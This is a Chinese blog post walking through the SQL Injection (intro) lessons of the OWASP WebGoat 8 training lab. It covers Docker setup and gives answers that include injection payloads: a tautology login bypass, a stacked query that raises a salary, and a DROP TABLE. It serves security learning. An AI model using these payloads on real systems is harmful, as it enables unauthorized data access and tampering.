Webgoat8通关笔记(1)

最新推荐文章于 2024-04-15 20:41:40 发布
最新推荐文章于 2024-04-15 20:41:40 发布
阅读量3.4k 收藏 10
点赞数 2
分类专栏: 渗透测试 文章标签: java spring boot 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44689968/article/details/106466680
版权

1.什么是Webgoat?
WebGoat 是 OWASP 组织研制出的用于进行 web 漏洞实验的应用平台,用来说明 web 应用中存在的安全漏洞。WebGoat 运行在带有 java 虚拟机的平台之上,包括:跨站点脚本攻击(XSS)、访问控制、线程安全、操作隐藏字段、 操纵参数、弱会话 cookie、SQL 盲注、数字型 SQL 注入、字符串型 SQL 注入、web 服务、Open Authentication 失效、危险的 HTML 注释等等。WebGoat 提供了一系列 web 安全学习的教程, 某些课程也给出了视频演示,指导用户利用这些漏洞进行攻击
2.Webgoat8安装(基于docker)
下载容器:docker pull webgoat/webgoat-8.0
查看镜像:docker images
运行:docker run -p 8080:8080 -t webgoat/webgoat-8.0
浏览器访问:http://localhost:8080/WebGoat/login
在这里插入图片描述点击Register new user注册一个新账户,并登录
在这里插入图片描述

2.(A1)SQL Injection(intro)
X-02
在这里插入图片描述本题:查看示例表,尝试检索员工Bob Franco所在部门。主要考察sql语句的查询
(1)select department from employees where first_name=‘Bob’;
在这里插入图片描述(2)select department from employees where last_name=‘Franco’;
在这里插入图片描述x-03
在这里插入图片描述本题:把‘Tobi Barnett’的部门改成销售部。
update employees set department=‘Sales’ where first_name=‘Tobi’;
在这里插入图片描述x-04
在这里插入图片描述本题:给“employees”表中添加“phone”列,长度20
在这里插入图片描述x-05
在这里插入图片描述本题:尝试授予用户组“UnauthorizedUser”更改表的权限
在这里插入图片描述x-09
在这里插入图片描述本题考察字符串sql注入:
SELECT * FROM user_data WHERE first_name = ‘John’ and last_name = ‘’ or ‘1’ = ‘1’
在这里插入图片描述x-10
在这里插入图片描述本题考察数值型sql注入:
SELECT * FROM user_data WHERE first_name = ‘John’ and last_name = ‘’ or ‘1’ = ‘1’
在这里插入图片描述x-11
在这里插入图片描述本题考查字符串注入:
employee name: Smith
tan:’ or ’ 1 ’ = ’ 1
在这里插入图片描述x-12
在这里插入图片描述本题使用查询链破坏完整性:
employee name: ’ ; update employees set salary=1000000 where last_name=‘Smith’; –
tan: 随便填
在这里插入图片描述x-13
在这里插入图片描述'; drop table access_log;–
在这里插入图片描述

我不吃丶香菜
关注
专栏目录
WebGoat通关教程
玄道的网安博客
05-05 1万+
这里我们用docker镜像一键搭建即可 用docker命令开启webgoat docker run -d -p 8081:8080 -p 9090:9090 -e TZ=Europe/Amsterdam webgoat/goatandwolf 打开192.168.109.131:8081/WebGoat和192.168.109.131:9090/WebWolf能打开即可 192.168...
WebGoat通关详解.zip
03-22
webgoat通关
WebGoat8.2.2通关记录一(General、Injection)
fiskeryang的专栏
06-25 2830
本课程描述了什么是结构化查询语言(SQL),以及如何操作它来执行开发人员最初不打算执行的任务什么是SQL?尝试检索员工Bob Franco的部门解:简单的SQL查询数据操作语言(DML)尝试将Tobi Barnett的部门改为“Sales”。数据定义语言(DDL)现在尝试通过将列“phone”(varchar(20))添加到表“employees”中.数据控制语言(DCL)尝试将表的权限授予未经授权的用户:Try It!String SQL injection 字符串SQL注入。
WebGoat通关攻略与详细解析——SQL Injection(intro)篇
qq_43739482的博客
10-18 4785
WebGoat靶机通关攻略,详细描述了题目的要求、解题思路和过程、通关答案。
Web安全攻防靶场之WebGoat8 - Developer Tools
u013650297的博客
01-22 435
Web安全攻防靶场之WebGoat8 - Developer Tools Developer Tools 谷歌浏览器开发工具 使用谷歌浏览器F12 打开控制台Console tab 在控制台选项卡中,您可以看到加载的JavaScript文件可能已经打印到其中的任何内容。如果你看到红色的东西不要担心。虽然这是一个错误,但它可能已经自行解决了。通过console选项卡,您还可以运行自己的JavaScript代码行 在首先使用快捷键CTRL+L清除console 在控制台中输入js webgoat.custom
WebGoat v8.0打靶笔记
m0_60716947的博客
05-23 1170
(一)环境的配置 这里用的时vm中的kali虚拟机安装的,建议以root身份来运行 (1)安装docker kali安装docker环境_欧晨eli的博客-CSDN博客_kali安装docker (2)WebGoat获取 sudo docker pull webgoat/webgoat-8.0 sudo docker pull webgoat/webwolf sudo docker pull webgoat/goatandwolf 之后输入 docker images, (3)burp
webgoat-server-8.2.1
09-02
webgoat-server-8.2.1
WebGoat 8安装、配置、使用教程(CentOS)
weixin_33725722的博客
04-19 2643
一、说明 1.1 背景说明 之前只用过dvwa,听说WebGoat也是类似的平台后,想装来试试有没有什么异同。 看了下载文件,和网上官方的、非官方的安装教程,感觉很多都对不上; 最后发现WebGoat 8是几天前才发布的,网上官方的、非官方的安装教程都是针对的WebGoat 7或更前面的版本,所以这里根据自己的步骤整理了一篇教程。 (应该是因为webgoat8是使用spring boot框架开发的...
WebGoat通关详解
chengede98的博客
03-22 1577
通过完成WebGoat的通关过程,用户可以全面提升自己在Web安全领域的知识和技能水平。因此,我们鼓励更多的用户参与到WebGoat的学习中来,共同为构建一个更安全Web环境贡献力量。这有助于用户了解自己的学习进度和需要改进的地方。因此,用户需要保持学习和实践的态度,不断更新自己的知识和技能。除了完成WebGoat的练习外,用户还可以关注最新的安全动态和技术趋势,参与相关的安全活动和项目实践。参考文档和社区资源:如果遇到难以解决的问题或需要进一步的帮助,用户可以参考WebGoat提供的文档和社区资源。
WebGoat通关攻略
热门推荐
weixin_45539802的博客
01-06 2万+
WebGoat通关攻略 目录WebGoat通关攻略前言一、环境配置1.Docker配置2.WebGoat获取3.WebGoat连接二、通关攻略(建设中)1.Introduction2.General3.Injection4.Broken Authentication5.Sensitive Data Exposure6.XML External Entities(XXE)7.Broken Access Control8.Cross-Site Scripting(XSS)9.Insecure Deseriali
WebGoat学习笔记(八)——Insecure Communication
走走停停
11-26 1672
<br />第一步:<br /> <br />这个实验需要用到wireshark抓包,但是127.0.0.1(192.168.44.130)的包是不能捕获到的,需要从虚拟机外(环境是虚拟机)(ip:192.168.44.1)访问192.168.44.130:,wireshark才能捕获到。<br /> <br />为了能够访问,需要修改tomcat的配置参数。在WebGoat-5.3_RC1/tomcat/conf/server8080.xml中,将如下段中的127.0.0.1改成192.168.44.13
面试必备:WebGoat实战通关指南!一(General、Injection)
03-22
webgoat通关【2024年WebGoat8.2.2通关记录一(General、Injection)简介】 内容概要: 本文为网络安全初学者提供了一个全面的学习指南,通过通俗易懂的语言,介绍了WebGoat8.2.2版本的General和Injection两个关卡的通关技巧。同时,文章还提供了实战演练和进阶学习资源,帮助读者更深入地理解和掌握网络安全技能。 适用人群: 本篇文章主要面向网络安全初学者,特别是那些即将参加面试的求职者。它为读者提供了一个实用的指南,帮助他们掌握网络安全的基本知识和实战技巧。 使用场景及目标: 本篇文章适用于求职者准备涉及网络安全的面试场景。它的目标是帮助求职者理解并掌握这些概念,从而在面试中更好地展示自己的技术能力和问题解决能力。 其他说明: 文章采用通俗易懂、口语化的语言风格,旨在让读者轻松理解并吸收内容。同时,文章还强调了准备理论知识、实际案例和编码实践的重要性,鼓励求职者在面试中展示自己的实际操作能力和项目经验。此外,文章还提供了心态调整建议,帮助求职者全面提升面试技巧。最后,文章鼓励求职者保持积极的心态,将面试视为自我发现和成长的机会。
WebGoat笔记
10-14
webgoat7.0的部署及题目解题教程,WebGoat里面关于会话劫持(Hijack a Session)这个课程的标准答案里面除了使用WebScarab以外还使用了其他的工具来找出合法的SessionID以完成这个课程
webgoat通关汇总文章
seanyang_的博客
11-13 1276
这个版本的webgoat按照owasp2021的top10内容设计的,汇总了webgoat通关的所有文章,
WebGoat8,妈妈再也不用担心我的面试
最新发布
qq194582923的博客
04-15 922
本课程描述了什么是结构化查询语言(SQL),以及如何操作它来执行开发人员最初不打算执行的任务题2 : 什么是SQL?尝试检索员工Bob Franco的部门解:简单的SQL查询题3 : 数据操作语言(DML)尝试将Tobi Barnett的部门改为“Sales”。题4: 数据定义语言(DDL)现在尝试通过将列“phone”(varchar(20))添加到表“employees”中.题5 : 数据控制语言(DCL)尝试将表的权限授予未经授权的用户:题9: Try It!
WebGoat8.2.2通关记录二( Broken Authentication )
fiskeryang的专栏
07-21 577
Base64Urlencode : Base64 URL编码是Base64编码算法的修改版本,用于以URL安全的格式对二进制数据进行编码。这是因为在某些上下文中,例如在url中,标准Base64编码可能不是url安全的,并且可能导致特殊字符的问题。上面的Sql由于kid=asdf不存在不会返回任何值,而union后的则会返回 c2Rm 也就是表示当前的key已经被篡改为了 sdf。尝试更改您收到的令牌,并通过更改令牌成为管理员用户并重置投票。刷新令牌的安全性问题:需要使用tom的账户来为你的订单买单。
java csl_Java代码审计入门:WebGoat8(再会)
weixin_30538955的博客
02-23 959
WebGoat8系列文章:前情回顾数字观星 Jack Chan(Saturn),再会篇为Java代码审计入门:WebGoat8系列的第二篇,意为与WebGoat8再次相会。本篇我们将一起看看WebGoat8中的Authentication Bypasses和JWT相关安全问题。Authentication Bypasses 认证绕过这节课程首先给了我们一个2016年的PayPal双因子密码重置的漏...
WebGoat V8.1.0.zip
12-29
WebGoat最新版本8.1.0(截止至2020.12.29),包括WebGoat和WebWolf。WebGoat是OWASP组织研制出的用于进行web漏洞实验的应用平台,安全测试训练课程有30多个,包括:跨站点脚本攻击(XSS)、访问控制、弱会话cookie、SQL盲注、数字型SQL注入、字符串型SQL注入、web服务等等
Web安全入门之WebGoat8.0环境搭建
2201_75735270的博客
04-01 1159
WebGoat是OWASP维护的,用于进行WEB漏洞测试和学习的JAVA应用程序。
WebGoat笔记
tzh2009的专栏
06-19 3358
文章来源:http://www.cnblogs.com/jonniexie/category/250726.html 主要内容:WebGoat的安装(略),内部访问方法与后续需要使用的Firebug的一些功能一.WebGoat安装(略)与访问二.浏览器推荐使用Firefox(1)FireBug安装(2)定位查看页面元素(3)Js调试 
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值